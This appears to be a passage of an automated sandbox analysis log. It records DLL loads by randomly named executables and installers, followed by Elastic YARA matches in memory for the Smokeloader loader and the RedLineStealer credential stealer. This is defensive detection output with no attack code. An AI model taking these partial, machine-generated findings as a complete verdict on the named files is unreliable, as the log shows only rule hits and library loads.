                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: oleacc.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: version.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: shfolder.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msvcr100.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: version.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: secur32.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dbghelp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winmm.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dbgcore.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: netutils.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: schannel.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: version.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: secur32.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dbghelp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winmm.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: dbgcore.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSection loaded: msvcr100.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: oleacc.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: version.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: shfolder.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: textinputframework.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: coreuicomponents.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wtsapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: cscapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: winsta.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: colorui.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: mscms.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coloradapterclient.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: compstui.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: inetres.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exeSection loaded: apphelp.dll
                    Source: 0000002E.00000002.3117097610.0000000000570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000001C.00000002.3370878314.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000020.00000002.3324630300.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000002E.00000002.3117320698.00000000006F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000025.00000002.3137395585.00000000007C2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000025.00000002.3136775469.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000001C.00000002.3386959537.0000000000732000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000016.00000002.3368358435.0000000000652000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000019.00000002.2841787321.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000020.00000002.3324821241.0000000000722000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
